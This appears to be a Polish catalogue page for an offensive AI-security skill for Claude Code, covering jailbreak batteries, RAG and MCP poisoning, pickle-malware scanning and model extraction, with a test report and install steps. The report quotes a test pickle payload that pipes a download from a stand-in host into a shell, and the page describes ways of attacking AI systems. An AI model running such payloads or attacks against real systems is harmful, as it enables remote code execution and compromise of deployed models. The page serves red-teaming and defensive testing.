AI Security
Ofensywne testowanie systemów LLM/ML: prompt injection, zatruwanie RAG, skanowanie modeli pickle
Testowano · Działa
Co robi ten skill
Umiejętność ofensywnego bezpieczeństwa do red-teamingu systemów AI/ML: prompt-injection i wieloetapowe baterie jailbreak, zatruwanie RAG/vector-DB, audyty zatruwania narzędzi MCP/agent, skanowanie złośliwego oprogramowania modeli pickle przed załadowaniem oraz sondy ekstrakcji modeli czarnej skrzynki/wnioskowania o członkostwie, z mapowaniami OWASP LLM Top-10 i MITRE ATLAS. Uruchamia się, gdy użytkownik prosi o atakowanie, red-teaming lub audyt LLM, chatbota, potoku RAG, serwera MCP lub pobranego artefaktu modelu. Zawiera pięć uruchamialnych skryptów Python oraz pięć szczegółowych analiz referencyjnych powiązanych z konkretnymi CVE z lat 2024-2025.
Raport z testu
Pobrano skills/ai-security/SKILL.md i sprawdzono 3 dołączone pliki (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — wszystkie HTTP 200. Dla OUTPUT uruchomiłem skrypt scripts/model_scan.py (tylko stdlib) umiejętności na przygotowanych przeze mnie plikach pickle: złośliwym z __reduce__ -> os.system("curl http://evil.tld/x | sh"), nieszkodliwym oraz nieszkodliwym, którego dane zawierały jedynie ciągi "operating_system"/"subprocess". Linia bazowa (naiwny byte-grep) oznaczyła złośliwy plik, ale także FALSE-POSITIVED nieszkodliwy plik listy etykiet. Umiejętność zdeasemblowała kody operacji pickle za pomocą pickletools, rozwiązała posix.system poprzez REDUCE-reachability jako wywoływalny element na czarnej liście (strukturalny JSONL: severity high, CWE-502, AML.T0011, exit code 2 jako brama CI) i prawidłowo oczyściła oba nieszkodliwe pliki. Zweryfikowano instalację w czystym mktemp HOME, umieszczając SKILL.md w ~/.claude/skills/ai-security/SKILL.md.
Testowano: 2026-07-31 · Claude Code 2.x (agent harness)
Instalacja
git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src mkdir -p ~/.claude/skills cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security # Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/). # Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers; # promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint. # Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone): # /plugin marketplace add hypnguyen1209/offensive-claude # /plugin install offensive-claude@offensive-claude-marketplace # NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.
Komendy i przykładowe prompty
/ai-securityOfensywne testowanie systemów LLM/ML: prompt injection, zatruwanie RAG, skanowanie modeli pickle
Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):
Test this model against known jailbreak techniquesCheck this RAG pipeline for vector poisoningRun a model extraction attack against this API